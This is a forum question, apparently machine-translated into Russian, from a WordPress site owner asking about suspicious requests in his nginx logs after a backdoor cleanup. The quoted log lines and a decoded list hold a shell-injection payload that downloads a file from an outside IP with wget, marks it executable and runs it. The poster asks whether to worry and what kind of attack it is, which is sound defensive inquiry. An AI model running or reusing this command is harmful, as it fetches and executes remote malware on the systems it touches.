Я использую Wordpress на своем сайте, недавно я заблокировал хакера, который заразил мой сайт ОЧЕНЬ МНОЖЕСТВУЮЩИМИ БАКАДОРАМИ (буквально тысячи бэкдоров). Я провожу полтора месяца, чтобы поспорить с ним. Это была не моя вина, парень, который работал до моей работы, никогда не обновлял сайт.
После этого я заметил странный доступ к файлам, которых просто не существует, и я думаю, что хакер пытается найти известные эксплойты из плагинов WordPress, которые я не использую. Это нормально, мне все равно. Но одна из этих попыток привлекла мое внимание.
95.249.95.104 - - [17/Jan/2020:10:17:29 -0300] "karin***com.br" "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 552 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" "-"
94.200.107.2 - - [17/Jan/2020:13:52:28 -0300] "karin***com.br" "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 552 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" "-"
197.226.122.184 - - [17/Jan/2020:14:57:36 -0300] "karin***com.br" "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 552 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" "-"
Я скрываю часть URL, извините.
IP-адреса всегда меняются, даже при последовательных запросах с разницей менее одной секунды, возможно DDoS. Пользовательский агент обычно тоже меняется, здесь есть все: iPhone, iPad, Android, Windows 7, 8, 10, Firefox, Google Chrome, Inte rnet Explorer ... Но Linux и Ма c. Эти 3 запроса являются единственным исключением.
Я заметил, что в URL есть несколько команд оболочки. Вот эти:
cd /tmp;
rm -rf .j;
wget http://91.92.66.124/..j/.j;
chmod 777 .j;
sh .j;
echo DONE HTTP/1.1
В моем каталоге / tmp нет папок или файлов с таким именем.
Этот URL "karin" был старым сайтом, который давно не существует , Я не знаю, как он знает этот URL, даже я не знал. Каждый раз, когда я пытаюсь получить доступ к некоторому URL, который настроен на NGINX, но пути, как этот karin, не существует, я получаю ошибку 404 Но эти попытки дают ошибку 400.
404 - это нормально, потому что здесь ничего нет. А 400? Это означает, что здесь что-то есть, но он не может обработать отправленные данные. Я удалил конфигурацию nginx для этого URL и попробовал ее в других URL. Я всегда получал ошибку 404, я пробовал это:
***.***.***.*** - - [17/Jan/2020:15:29:20 -0300] "joa***com.br" "GET /shell?cd+/var/www/html/conf;mkdir+teste HTTP/1.1" 404 555 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" "-"
Итак, мой вопрос: следует ли бояться этих команд, возвращающих ошибку 400 на этом URL? Почему я не могу воспроизвести это? Очевидно, что эти попытки провалились, должен ли я быть уверен, что они провалились? Какой тип атаки это? Я никогда не слышал о «внедрении скрипта оболочки по URL», подобном этому.